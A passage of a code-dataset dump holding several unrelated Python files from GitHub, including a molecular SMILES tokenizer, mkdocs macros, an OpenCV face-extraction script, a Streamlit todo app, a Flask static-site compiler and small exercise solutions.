self.pointer_node_traj[-1]\n self.up_loc_square[new_node, :new_node] = self.up_loc_square[pointer_node, :new_node] + 1\n self.down_loc_square[new_node, :new_node] = self.down_loc_square[pointer_node, :new_node]\n\n self.up_loc_square[:new_node, new_node] = self.up_loc_square[:new_node, pointer_node]\n self.down_loc_square[:new_node, new_node] = self.down_loc_square[:new_node, pointer_node] + 1\n\n self.pointer_node_traj.append(new_node)\n\n elif token == BRANCH_START_TOKEN:\n pointer_node = self.pointer_node_traj[-1]\n self.branch_start_nodes.append(pointer_node)\n self.pointer_node_traj.append(pointer_node)\n\n elif token == BRANCH_END_TOKEN:\n pointer_node = self.branch_start_nodes.pop()\n self.pointer_node_traj.append(pointer_node)\n\n elif token == RING_START_TOKEN:\n pointer_node = self.pointer_node_traj[-1]\n self._ring_offset += 1\n new_ring = copy(self._ring_offset)\n self.ring_to_nodes[new_ring].append(pointer_node)\n self.pointer_node_traj.append(pointer_node)\n\n elif token in RING_END_TOKENS:\n pointer_node = self.pointer_node_traj[-1]\n ring = get_ring_end_idx(token)\n self.ring_to_nodes[ring].append(pointer_node)\n self.pointer_node_traj.append(pointer_node)\n\n elif token == BOS_TOKEN:\n self.started = True\n\n elif token == EOS_TOKEN:\n self.ended = True\n\n # compute graph mask\n if token in ATOM_TOKENS:\n allowed_next_tokens = BOND_TOKENS + [BRANCH_START_TOKEN, RING_START_TOKEN]\n if not self.all_branch_closed():\n allowed_next_tokens.append(BRANCH_END_TOKEN)\n else:\n allowed_next_tokens.append(EOS_TOKEN)\n\n elif token in BOND_TOKENS:\n allowed_next_tokens = deepcopy(ATOM_TOKENS)\n for ring in self.ring_to_nodes:\n if len(self.ring_to_nodes[ring]) == 1 and self.ring_to_nodes[ring][0] != pointer_node:\n allowed_next_tokens.append(get_ring_end_token(ring))\n\n elif token == BRANCH_START_TOKEN:\n allowed_next_tokens = BOND_TOKENS\n\n elif token == BRANCH_END_TOKEN:\n allowed_next_tokens = [BRANCH_START_TOKEN]\n if not self.all_branch_closed():\n allowed_next_tokens.append(BRANCH_END_TOKEN)\n else:\n allowed_next_tokens.append(EOS_TOKEN)\n\n elif token == RING_START_TOKEN:\n allowed_next_tokens = BOND_TOKENS + [BRANCH_START_TOKEN, RING_START_TOKEN]\n if not self.all_branch_closed():\n allowed_next_tokens.append(BRANCH_END_TOKEN)\n elif self.all_branch_closed():\n allowed_next_tokens.append(EOS_TOKEN)\n\n elif token in RING_END_TOKENS:\n allowed_next_tokens = []\n if not self.all_branch_closed():\n allowed_next_tokens.append(BRANCH_END_TOKEN)\n else:\n allowed_next_tokens.append(EOS_TOKEN)\n\n elif token == BOS_TOKEN:\n allowed_next_tokens = ATOM_TOKENS\n\n elif token == EOS_TOKEN:\n allowed_next_tokens = []\n\n graph_mask = np.ones(len(TOKENS), dtype=bool)\n graph_mask[get_ids(allowed_next_tokens)] = False\n self.graph_mask_traj.append(graph_mask)\n\n # compute valency mask\n valence_mask = np.zeros(len(TOKENS), dtype=bool)\n if token in ATOM_TOKENS:\n valence = get_max_valence(token)\n if new_node > 0:\n valence -= get_bond_order(self.node_to_token[pointer_node])\n\n self.node_to_valence[new_node] = valence\n\n forbidden_bond_tokens = [token_ for token_ in BOND_TOKENS if get_bond_order(token_) > valence]\n valence_mask[get_ids(forbidden_bond_tokens)] = True\n\n if valence < 2:\n valence_mask[get_id(RING_START_TOKEN)] = True\n valence_mask[get_id(BRANCH_START_TOKEN)] = True\n\n elif token in BOND_TOKENS:\n bond_order = get_bond_order(token)\n self.node_to_valence[pointer_node] -= bond_order\n \n forbidden_atom_tokens = [token_ for token_ in ATOM_TOKENS if get_max_valence(token_) < bond_order]\n \n forbidden_rings = [\n get_ring_end_token(ring)\n for ring in self.ring_to_nodes\n if self.node_to_valence[self.ring_to_nodes[ring][0]] < (bond_order - 1)\n ]\n\n valence_mask[get_ids(forbidden_atom_tokens)] = True\n valence_mask[get_ids(forbidden_rings)] = True\n\n elif token == BRANCH_START_TOKEN:\n valence = self.node_to_valence[pointer_node]\n forbidden_bond_tokens = [token_ for token_ in BOND_TOKENS if get_bond_order(token_) > valence]\n valence_mask[get_ids(forbidden_bond_tokens)] = True\n\n elif token == BRANCH_END_TOKEN:\n if self.node_to_valence[pointer_node] == 0:\n valence_mask[get_id(BRANCH_START_TOKEN)] = True\n\n elif token == RING_START_TOKEN:\n self.node_to_valence[pointer_node] -= 1\n\n valence = self.node_to_valence[pointer_node]\n forbidden_bond_tokens = [token_ for token_ in BOND_TOKENS if get_bond_order(token_) > valence]\n valence_mask[get_ids(forbidden_bond_tokens)] = True\n if valence < 2:\n valence_mask[get_id(RING_START_TOKEN)] = True\n valence_mask[get_id(BRANCH_START_TOKEN)] = True\n\n elif token in RING_END_TOKENS:\n prev_bond_order = get_bond_order(self.node_to_token[pointer_node])\n ring = get_ring_end_idx(token)\n self.node_to_valence[self.ring_to_nodes[ring][0]] -= prev_bond_order - 1\n\n self.valence_mask_traj.append(valence_mask)\n\n def all_branch_closed(self):\n return len(self.branch_start_nodes) == 0\n\n def all_ring_closed(self):\n return all([(len(self.ring_to_nodes[ring]) == 2) for ring in self.ring_to_nodes])\n\n def to_smiles(self):\n if self.error is not None:\n return None\n\n num_nodes = self._node_offset + 1\n up_loc_square = self.up_loc_square[:num_nodes, :num_nodes]\n down_loc_square = self.down_loc_square[:num_nodes, :num_nodes]\n\n node0s, node1s = ((up_loc_square + down_loc_square) == 1).nonzero()\n node0s, node1s = node0s[node0s < node1s], node1s[node0s < node1s]\n\n mollinegraph = nx.Graph()\n mollinegraph.add_nodes_from(list(range(num_nodes)))\n mollinegraph.add_edges_from(zip(node0s, node1s))\n for _, ring_nodes in self.ring_to_nodes.items():\n if len(ring_nodes) == 2:\n node0, node1 = ring_nodes\n mollinegraph.add_edge(node0, node1)\n\n molgraph = nx.Graph()\n for node in mollinegraph.nodes():\n token = self.node_to_token[node]\n if token in ATOM_TOKENS:\n molgraph.add_node(node, token=token)\n elif token in BOND_TOKENS:\n try:\n node0, node1 = mollinegraph.neighbors(node)\n except:\n print(self.tokens)\n assert False\n\n molgraph.add_edge(node0, node1, token=token)\n\n smiles = molgraph2smiles(molgraph)\n\n return smiles\n\n @staticmethod\n def from_smiles(smiles, randomize):\n molgraph = smiles2molgraph(smiles)\n atom_tokens = nx.get_node_attributes(molgraph, \"token\")\n bond_tokens = nx.get_edge_attributes(molgraph, \"token\")\n bond_tokens.update({(node1, node0): val for (node0, node1), val in bond_tokens.items()})\n\n tokens = nx.get_node_attributes(molgraph, \"token\")\n\n mollinegraph = nx.Graph()\n for node in molgraph.nodes:\n mollinegraph.add_node(node)\n\n for edge in molgraph.edges:\n u, v = edge\n mollinegraph.add_node(edge)\n mollinegraph.add_edge(u, edge)\n mollinegraph.add_edge(v, edge)\n\n def keyfunc(idx):\n return (molgraph.degree(idx), molgraph.nodes[idx].get(\"token\")[0] == 6, idx)\n\n start = min(molgraph.nodes, key=keyfunc)\n successors = dfs_successors(mollinegraph, source=start, randomize_neighbors=randomize)\n predecessors = dict()\n for node0 in successors:\n for node1 in successors[node0]:\n predecessors[node1] = node0\n\n #\n edges = set()\n for n_idx, n_jdxs in successors.items():\n for n_jdx in n_jdxs:\n edges.add((n_idx, n_jdx))\n edges.add((n_jdx, n_idx))\n\n ring_edges = [edge for edge in mollinegraph.edges if tuple(edge) not in edges]\n\n node_to_ring_idx = defaultdict(list)\n for ring_idx, (atom_node, bond_node) in enumerate(ring_edges):\n node_to_ring_idx[atom_node].append(ring_idx)\n node_to_ring_idx[bond_node].append(ring_idx)\n\n tokens = []\n to_visit = [start]\n seen_ring_idxs = []\n while to_visit:\n current = to_visit.pop()\n if current in [BRANCH_START_TOKEN, BRANCH_END_TOKEN]:\n tokens.append(current)\n\n elif current in atom_tokens:\n tokens.append(atom_tokens[current])\n\n elif current in bond_tokens:\n tokens.append(bond_tokens[current])\n\n else:\n assert False\n\n if current in node_to_ring_idx:\n for ring_idx in node_to_ring_idx[current]:\n if ring_idx not in seen_ring_idxs:\n tokens.append(RING_START_TOKEN)\n seen_ring_idxs.append(ring_idx)\n else:\n tokens.append(get_ring_end_token(seen_ring_idxs.index(ring_idx)))\n\n next_nodes = successors.get(current, [])\n if len(next_nodes) == 1:\n to_visit.append(next_nodes[0])\n\n elif len(next_nodes) > 1:\n for next_node in reversed(next_nodes):\n to_visit.append(BRANCH_END_TOKEN)\n to_visit.append(next_node)\n to_visit.append(BRANCH_START_TOKEN)\n\n data = Data()\n for token in tokens:\n data.update(get_id(token))\n if data.error is not None:\n print(data.error)\n\n data.update(get_id(EOS_TOKEN))\n\n return data\n\n def featurize(self):\n #\n sequence_len = len(self.sequence)\n sequence = torch.LongTensor(np.array(self.sequence))\n \n mask = (sequence == get_id(RING_START_TOKEN))\n count_sequence = mask.long().cumsum(dim=0)\n count_sequence = count_sequence.masked_fill(mask, 0)\n \n graph_mask_sequence = torch.tensor(np.array(self.graph_mask_traj), dtype=torch.bool)\n valency_mask_sequence = torch.tensor(np.array(self.valence_mask_traj), dtype=torch.bool)\n\n #\n linear_loc_square = (\n torch.abs(torch.arange(sequence_len).unsqueeze(0) - torch.arange(sequence_len).unsqueeze(1)) + 1\n )\n\n #\n pad_right = 1 if self.ended else 0\n\n up_loc_square = self.up_loc_square[self.pointer_node_traj][:, self.pointer_node_traj]\n up_loc_square = np.pad(up_loc_square + 1, (1, pad_right), \"constant\")\n up_loc_square = torch.LongTensor(up_loc_square)\n\n down_loc_square = self.down_loc_square[self.pointer_node_traj][:, self.pointer_node_traj]\n down_loc_square = np.pad(down_loc_square + 1, (1, pad_right), \"constant\")\n down_loc_square = torch.LongTensor(down_loc_square)\n\n return sequence, count_sequence, graph_mask_sequence, valency_mask_sequence, linear_loc_square, up_loc_square, down_loc_square\n\n @staticmethod\n def collate(data_list):\n (\n sequences,\n count_sequences, \n graph_mask_sequences,\n valency_mask_sequences,\n linear_loc_squares,\n up_loc_squares,\n down_loc_squares,\n ) = zip(*data_list)\n\n sequences = pad_sequence(sequences, batch_first=True, padding_value=get_id(PAD_TOKEN))\n count_sequences = pad_sequence(count_sequences, batch_first=True, padding_value=get_id(PAD_TOKEN))\n graph_mask_sequences = pad_sequence(graph_mask_sequences, batch_first=True, padding_value=get_id(PAD_TOKEN))\n valency_mask_sequences = pad_sequence(valency_mask_sequences, batch_first=True, padding_value=get_id(PAD_TOKEN))\n\n linear_loc_squares = pad_square(linear_loc_squares, padding_value=0)\n up_loc_squares = pad_square(up_loc_squares, padding_value=0)\n down_loc_squares = pad_square(down_loc_squares, padding_value=0)\n\n return (\n sequences,\n count_sequences, \n graph_mask_sequences,\n valency_mask_sequences,\n linear_loc_squares,\n up_loc_squares,\n down_loc_squares,\n )\n","repo_name":"binghong-ml/molgen","sub_path":"src/data/target_data.py","file_name":"target_data.py","file_ext":"py","file_size_in_byte":16637,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13933870332","text":"import os\nimport urllib.error\nimport urllib.request\nimport urllib.parse as url\nfrom datetime import datetime\nfrom decimal import Decimal\nfrom pathlib import Path\n\nimport humanfriendly\n\n\ndef last_modified_to_datetime(last_modified: str) -> datetime | None:\n \"\"\"Take the \"Last-Modified\" header and turn it into a Python\n datetime object.\n\n If it can't be parsed, it returns a None.\"\"\"\n\n try:\n parsed = datetime.strptime(last_modified, \"%a, %d %b %Y %H:%M:%S %Z\")\n except ValueError:\n return None\n\n return parsed\n\n\n# Taken from https://docs.python.org/3/library/decimal.html#recipes\ndef moneyfmt(\n value: Decimal,\n places: int = 2,\n curr: str = \"\",\n sep=\",\",\n dp: str = \".\",\n pos: str = \"\",\n neg: str = \"-\",\n trailneg: str = \"\",\n):\n \"\"\"Convert Decimal to a money formatted string.\n\n places: required number of places after the decimal point\n curr: optional currency symbol before the sign (may be blank)\n sep: optional grouping separator (comma, period, space, or blank)\n dp: decimal point indicator (comma or period)\n only specify as blank when places is zero\n pos: optional sign for positive numbers: '+', space or blank\n neg: optional sign for negative numbers: '-', '(', space or blank\n trailneg:optional trailing minus indicator: '-', ')', space or blank\n\n >>> d = Decimal('-1234567.8901')\n >>> moneyfmt(d, curr='$')\n '-$1,234,567.89'\n >>> moneyfmt(d, places=0, sep='.', dp='', neg='', trailneg='-')\n '1.234.568-'\n >>> moneyfmt(d, curr='$', neg='(', trailneg=')')\n '($1,234,567.89)'\n >>> moneyfmt(Decimal(123456789), sep=' ')\n '123 456 789.00'\n >>> moneyfmt(Decimal('-0.02'), neg='<', trailneg='>')\n '<0.02>'\n\n \"\"\"\n q = Decimal(10) ** -places # 2 places --> '0.01'\n sign, digits, exp = value.quantize(q).as_tuple()\n result = []\n digits = list(map(str, digits))\n build, next = result.append, digits.pop\n if sign:\n build(trailneg)\n for i in range(places):\n build(next() if digits else \"0\")\n if places:\n build(dp)\n if not digits:\n build(\"0\")\n i = 0\n while digits:\n build(next())\n i += 1\n if i == 3 and digits:\n i = 0\n build(sep)\n build(curr)\n build(neg if sign else pos)\n return \"\".join(reversed(result))\n\n\ndef define_env(env):\n \"\"\"This is the hook for defining variables, macros and filters\n\n - variables: the dictionary that contains the environment variables\n - macro: a decorator function, to declare a macro.\n - filter: a function with one of more arguments,\n used to perform a transformation\n \"\"\"\n site_url = (\n env.conf[\"site_url\"] if \"site_url\" in env.conf else \"https://lab.rebma.io/\"\n )\n archive_url = (\n env.conf[\"archive_url\"]\n if \"archive_url\" in env.conf\n else \"https://rebma-archive.s3.us-west-000.backblazeb2.com/\"\n )\n\n @env.macro\n def embed_schematic(schematic_filename: str, height: int = 480) -> str:\n \"\"\"Generate HTML to embed circuit.js diagram in the document.\n\n Args:\n schematic (str): filename of schematic\n\n Returns:\n str: HTML\n \"\"\"\n BASE_URL_FOR_CIRCUITJS = \"\"\"https://www.falstad.com/circuit/circuitjs.html\"\"\"\n\n IFRAME_TEMPLATE = (\n r\"\"\"\"\"\"\n )\n\n # Account for this not being defined in production because we're\n # not running a server, but instead doing static site generation.\n circuit_url = f\"{site_url}circuits/{schematic_filename}\"\n\n # These options are derived from circuitjs documentation.\n # https://github.com/pfalstad/circuitjs1#embedding\n EMBED_OPTIONS = {\n \"hideMenu\": \"true\",\n }\n\n query_string = url.urlencode(\n dict(startCircuitLink=circuit_url) | EMBED_OPTIONS,\n doseq=True,\n safe=\":/\",\n quote_via=url.quote,\n )\n\n final_url = BASE_URL_FOR_CIRCUITJS + \"?\" + query_string\n\n return IFRAME_TEMPLATE.format(url=final_url)\n\n @env.macro\n def link_for_download(\n filename: str,\n license: str = \"Unknown\",\n icon: str = \":material-download-circle-outline:\",\n archive: bool = False,\n ) -> str:\n \"\"\"Take the provided information and render a consistent view of\n a file download. The goal is to provide a display of the file\n name, license, size, and last touched.\n\n If `archive` is False, this works for files in the\n $ROOT/docs/files directory. If it is True, then it renders the\n URL as one to the B2 Backblaze archive.\n \"\"\"\n # fmt: off\n ANNOTATION_TEMPLATE = r\"\"\"Size: {size}; Updated: {ts}; License: {license}\"\"\"\n # fmt: on\n\n if archive:\n file_url = f\"{archive_url}/{filename}\"\n try:\n request = urllib.request.Request(file_url, method=\"HEAD\")\n response = urllib.request.urlopen(request)\n except urllib.error.URLError:\n return \"**FILE_NOT_FOUND**\"\n\n file_size = int(response.headers[\"Content-Length\"])\n file_mtime = last_modified_to_datetime(response.headers[\"Last-Modified\"])\n else:\n # Set up a bunch of paths the ugliest way possible\n path = f\"files/{filename}\"\n file_path = f\"docs/{path}\"\n file_url = f\"{site_url}{path}\"\n\n # First, let's make sure the file exists\n try:\n stat = os.stat(file_path)\n file_size = stat.st_size\n file_mtime = datetime.fromtimestamp(stat.st_mtime)\n except FileNotFoundError:\n return \"**FILE_NOT_FOUND**\"\n\n # Strip off anything before the last slash\n filename = filename.split(\"/\")[-1]\n\n annotation = ANNOTATION_TEMPLATE.format(\n size=humanfriendly.format_size(file_size),\n ts=file_mtime.isoformat(sep=\" \", timespec=\"minutes\"), # Trim to minutes\n license=license,\n )\n markdown = f'[{filename} {icon}]({file_url} \"{annotation}\")'\n return markdown\n\n @env.macro\n def usd(\n dollars: str,\n as_of: str = None,\n places: int = 2,\n icon: str = \":fontawesome-solid-money-bill-transfer:\",\n ) -> str:\n \"\"\"Take an input in USD and convert it to a proper notation,\n with link to exchange rate calculations on xr.com.\n\n By default, we just link to Euros since we had to choose\n something.\n \"\"\"\n # Build exchange URL\n url = f\"https://www.xe.com/currencyconverter/convert/?Amount={dollars}&From=USD&To=EUR\"\n\n # Convert to a Decimal\n usd = Decimal(dollars)\n\n as_of_str = f\"\"\":material-update:{{ title=\"as of {as_of}\" }}\"\"\" if as_of else \"\"\n return (\n f\"{moneyfmt(value=usd, places=places, curr='$')} \"\n f\"{as_of_str}[{icon}]({url} \"\n \"\"\" \"Convert to other currency\")\"\"\"\n )\n","repo_name":"rebma-io/lab","sub_path":"macros.py","file_name":"macros.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5473026784","text":"\"\"\"\nUSAGE\npython gather_examples.py -i videos -d face_detector -s 8 -r 1\npython gather_examples.py -i videos -d face_detector -s 6 -r 0\n\"\"\"\n\n# import the necessary packages\nimport numpy as np\nimport argparse\nimport cv2\nimport os\nfrom glob import glob\n\n\ndef bulk_processing(args):\n\t\"\"\"\n\tBulk Process all Images in the folder\n\t\"\"\"\n\t# load our serialized face detector from disk\n\tprint(\"[INFO] loading face detector...\")\n\tprotoPath = os.path.sep.join([args[\"detector\"], \"deploy.prototxt\"])\n\tmodelPath = os.path.sep.join([args[\"detector\"],\n\t\t\"res10_300x300_ssd_iter_140000.caffemodel\"])\n\tnet = cv2.dnn.readNetFromCaffe(protoPath, modelPath)\n\n\t# Split the videos into two batches: real and fake\n\tvideo_dir = args['input']\n\tvideo_sub_folders = os.path.sep.join([video_dir, '*/'])\n\tvideo_sub_folders = glob(video_sub_folders)\n\n\tfor sub_folder in video_sub_folders:\n\t\t\n\t\t# Detect video type and dataset path\n\t\tvideotype = str(os.path.split(sub_folder)[-2])\n\t\tdatasetpath = os.path.sep.join(['dataset', videotype])\n\n\t\t# Iterate through all videos in each folder\n\t\tvideos = glob(os.path.sep.join([sub_folder, '*.mov']))\n\t\tvideos.extend(glob(os.path.sep.join([sub_folder, '*.mp4'])))\n\n\t\t# number of frames saved thus far\n\t\tsaved = 0\n\n\t\t# open up existing images in the current folder and append to it instead of overwriting it\n\t\timages = glob(os.path.sep.join([datasetpath, \"*.png\"]))\n\t\timages.extend(glob(os.path.sep.join([datasetpath, '*.jpg'])))\n\t\tif args['reset']:\n\t\t\tfor im in images:\n\t\t\t\tos.remove(im)\n\t\telse:\n\t\t\tsaved = len(images)\n\n\t\tfor video in videos:\n\n\t\t\t# open a pointer to the video file stream and initialize the total\n\t\t\t# number of frames read thus far for skipping\n\t\t\tvs = cv2.VideoCapture(video)\n\t\t\tread = 0\n\n\t\t\t# loop over frames from the video file stream\n\t\t\twhile True:\n\t\t\t\t# grab the frame from the file\n\t\t\t\t(grabbed, frame) = vs.read()\n\n\t\t\t\t# if the frame was not grabbed, then we have reached the end\n\t\t\t\t# of the stream\n\t\t\t\tif not grabbed:\n\t\t\t\t\tbreak\n\n\t\t\t\t# increment the total number of frames read thus far\n\t\t\t\tread += 1\n\n\t\t\t\t# check to see if we should process this frame\n\t\t\t\tif read % args[\"skip\"] != 0:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# grab the frame dimensions and construct a blob from the frame\n\t\t\t\t(h, w) = frame.shape[:2]\n\t\t\t\tblob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,\n\t\t\t\t\t(300, 300), (104.0, 177.0, 123.0))\n\n\t\t\t\t# pass the blob through the network and obtain the detections and\n\t\t\t\t# predictions\n\t\t\t\tnet.setInput(blob)\n\t\t\t\tdetections = net.forward()\n\n\t\t\t\t# ensure at least one face was found\n\t\t\t\tif len(detections) > 0:\n\t\t\t\t\t# we're making the assumption that each image has only ONE\n\t\t\t\t\t# face, so find the bounding box with the largest probability\n\t\t\t\t\ti = np.argmax(detections[0, 0, :, 2])\n\t\t\t\t\tconfidence = detections[0, 0, i, 2]\n\n\t\t\t\t\t# ensure that the detection with the largest probability also\n\t\t\t\t\t# means our minimum probability test (thus helping filter out\n\t\t\t\t\t# weak detections)\n\t\t\t\t\tif confidence > args[\"confidence\"]:\n\t\t\t\t\t\t# compute the (x, y)-coordinates of the bounding box for\n\t\t\t\t\t\t# the face and extract the face ROI\n\t\t\t\t\t\tbox = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n\t\t\t\t\t\t(startX, startY, endX, endY) = box.astype(\"int\")\n\t\t\t\t\t\tface = frame[startY:endY, startX:endX]\n\n\t\t\t\t\t\t# write the frame to disk\n\t\t\t\t\t\tp = os.path.sep.join([datasetpath, \"{}.png\".format(saved)])\n\t\t\t\t\t\tcv2.imwrite(p, face)\n\t\t\t\t\t\tsaved += 1\n\t\t\t\t\t\tprint(\"[INFO] saved {} to disk\".format(p))\n\n\t\t\t# do a bit of cleanup\n\t\t\tvs.release()\n\t\t\tcv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n\n\t# construct the argument parse and parse the arguments\n\tap = argparse.ArgumentParser()\n\tap.add_argument(\"-i\", \"--input\", type=str, required=True,\n\t\thelp=\"path to input folder to all the videos\")\n\tap.add_argument(\"-r\", \"--reset\", type=int, default=0,\n\t\thelp=\"Option to delete all given images in the \")\n\tap.add_argument(\"-d\", \"--detector\", type=str, required=True,\n\t\thelp=\"path to OpenCV's deep learning face detector\")\n\tap.add_argument(\"-c\", \"--confidence\", type=float, default=0.5,\n\t\thelp=\"minimum probability to filter weak detections\")\n\tap.add_argument(\"-s\", \"--skip\", type=int, default=16,\n\t\thelp=\"# of frames to skip before applying face detection\")\n\targs = vars(ap.parse_args())\n\n\tbulk_processing(args)\n","repo_name":"jindongyang94/liveness_detection_opencv","sub_path":"gather_examples.py","file_name":"gather_examples.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9014522155","text":"# Day 20 - Web app building\nimport streamlit as st\nimport functions\n\ntodos = functions.get_todos()\n\n\ndef add_todo():\n user_input = st.session_state[\"new_todo\"] + \"\\n\"\n todos.append(user_input)\n functions.write_todos(todos)\n st.session_state[\"new_todo\"] = \"\"\n\n\nst.title(\"My Todo App\")\nst.subheader(\"This is my TodoApp\")\nst.write(\"This app is to increase your productivity and time management!\")\ntext_input = st.text_input(label=\"Please enter a new todo\", placeholder=\"Add new todo...\", on_change=add_todo, key=\"new_todo\")\n\nfor index, todo in enumerate(todos):\n checkbox = st.checkbox(todo, key=todo)\n if checkbox:\n todos.pop(index)\n functions.write_todos(todos)\n del st.session_state[todo]\n st.experimental_rerun()\n\n\n\n\n\n\n","repo_name":"jhangwu/my-todo-app","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18450256593","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read()\n\nrequirements = [ ]\n\ntest_requirements = [ ]\n\nsetup(\n author=\"Bart Stroeken\",\n author_email='bart.stroeken@gmail.com',\n python_requires='>=3.6',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n description=\"This is a set of utilities for quick and dirty data extraction processes from CSVs and json files\",\n install_requires=requirements,\n license=\"GNU General Public License v3\",\n long_description=readme + '\\n\\n' + history,\n include_package_data=True,\n keywords='qnd_utils',\n name='qnd_utils',\n packages=find_packages(include=['qnd_utils', 'qnd_utils.*']),\n test_suite='tests',\n tests_require=test_requirements,\n url='https://github.com/bartee/qnd_utils',\n version='0.1.0',\n zip_safe=False,\n)\n","repo_name":"bartee/qnd_utils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30011338768","text":"import math\r\n\r\nincome_per_person = float(input())\r\naverage_grade = float(input())\r\nminimum_salary = float(input())\r\n\r\nif average_grade >= 4.5:\r\n if average_grade >= 5.5:\r\n social_scholarship = 0.35 * minimum_salary\r\n excellent_result_scholarship = average_grade * 25\r\n scholarship = None\r\n if social_scholarship > excellent_result_scholarship and income_per_person < minimum_salary:\r\n scholarship = social_scholarship\r\n print(f'You get a Social scholarship {math.floor(scholarship)} BGN')\r\n else:\r\n scholarship = excellent_result_scholarship\r\n print(f'You get a scholarship for excellent results {math.floor(scholarship)} BGN')\r\n\r\n elif income_per_person < minimum_salary:\r\n scholarship = 0.35 * minimum_salary\r\n print(f'You get a Social scholarship {math.floor(scholarship)} BGN')\r\n else:\r\n print('You cannot get a scholarship!')\r\nelse:\r\n print('You cannot get a scholarship!')\r\n","repo_name":"NBakalov19/SoftUni_Python_Fundamentals","sub_path":"01.Python_Intro_Functions_And_Debugging/Scholarship.py","file_name":"Scholarship.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21089714359","text":"class SimpleReport:\n @classmethod\n def filter_by_oldest_fabrication(cls, inventory: list) -> str:\n return min(\n [fabrication[\"data_de_fabricacao\"] for fabrication in inventory]\n )\n\n @classmethod\n def filter_by_expiration_date(cls, inventory: list) -> str:\n return min(\n [fabrication[\"data_de_validade\"] for fabrication in inventory]\n )\n\n @classmethod\n def filter_manufacturer_by_max_product(cls, inventory: list) -> str:\n result = cls.get_all_manufactures(inventory)\n return max(result, key=result.get)\n\n @classmethod\n def get_all_manufactures(cls, inventory: list) -> dict:\n COMPANIES_NAMES = [\n fabrication[\"nome_da_empresa\"] for fabrication in inventory\n ]\n\n result = {}\n for company in COMPANIES_NAMES:\n if company not in result:\n result[company] = 1\n else:\n result[company] += 1\n return result\n\n @classmethod\n def generate(cls, inventory: list) -> str:\n oldest_fabrication = cls.filter_by_oldest_fabrication(inventory)\n expiration_date = cls.filter_by_expiration_date(inventory)\n companies_name = cls.filter_manufacturer_by_max_product(inventory)\n\n return (\n f\"Data de fabricação mais antiga: {oldest_fabrication}\\n\"\n f\"Data de validade mais próxima: {expiration_date}\\n\"\n f\"Empresa com mais produtos: {companies_name}\"\n )\n","repo_name":"mbrennerr/Project-Inventory-Report","sub_path":"inventory_report/reports/simple_report.py","file_name":"simple_report.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14155201020","text":"from pathlib import Path\nfrom time import sleep\n\nimport click\nfrom flask import Flask\n\nfrom .ssg import compiler\nfrom .ssg.helpers import pytz_dt_epoch\n\ncwd = Path(__file__).parent\n\n\ndef create_app():\n app = Flask(__name__)\n app.static_folder = \"static\"\n app.template_folder = \"templates\"\n\n doc_path = cwd.parent / \"docs\"\n markdown_path = cwd.parent / \"docs_md\"\n\n @app.cli.command(\"compile\")\n @click.option(\"--watch\", is_flag=True, help=\"Watch for file changes\")\n def compile_site(watch):\n if watch:\n watching_files = {}\n\n def change_loop():\n change = False\n updated = []\n for file in markdown_path.glob(\"**/*.md\"):\n if file not in watching_files:\n watching_files[file] = file.stat().st_mtime\n updated.append(file)\n change = True\n else:\n if file.stat().st_mtime > watching_files[file]:\n watching_files[file] = file.stat().st_mtime\n updated.append(file)\n change = True\n\n if change:\n print(\"Update detected, recompiling...\")\n for file in updated:\n print(f\" - {file}\")\n\n compiler(doc_path, markdown_path)\n\n print(\"Watching for changes...\")\n\n while True:\n change_loop()\n sleep(1)\n\n else:\n compiler(doc_path, markdown_path)\n\n @app.route(\"/\")\n def index():\n return \"To use run the following command: flask --app gdocs compile\"\n\n return app\n","repo_name":"CheeseCake87/Flask-Imp","sub_path":"gdocs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"52"} +{"seq_id":"74587641445","text":"def go(i, u, v):\n\n if d[i][u][v] is not None:\n return d[i][u][v]\n\n if i < u or i < v:\n return 0\n \n if i == 0 or u == 0 or v == 0:\n return 0\n\n d[i][u][v] = 0\n res = go(i-1, u-1, v-1) + up[u]*down[v]\n if u-1 >= 0 and i-1 >= v:\n res = max(res, go(i-1, u-1, v))\n if v-1 >= 0 and i-1 >= u:\n res = max(res, go(i-1, u, v-1))\n\n d[i][u][v] = res\n return res\n\nn = int(input())\n\nup = list(map(int, input().split()))\nup = [0] + [i for i in up if i != 0]\ndown = list(map(int, input().split()))\ndown = [0] + [i for i in down if i != 0]\n\nu_max = len(up) - 1\nv_max = len(down) - 1\n\nd = [[[None]*(v_max+1) for _ in range(u_max+1)] for _ in range(n+1)]\n\nprint(go(n, u_max, v_max))\n","repo_name":"jngcii/TIL","sub_path":"Algorithm/Advanced/DP/1983.숫자박스.py","file_name":"1983.숫자박스.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} 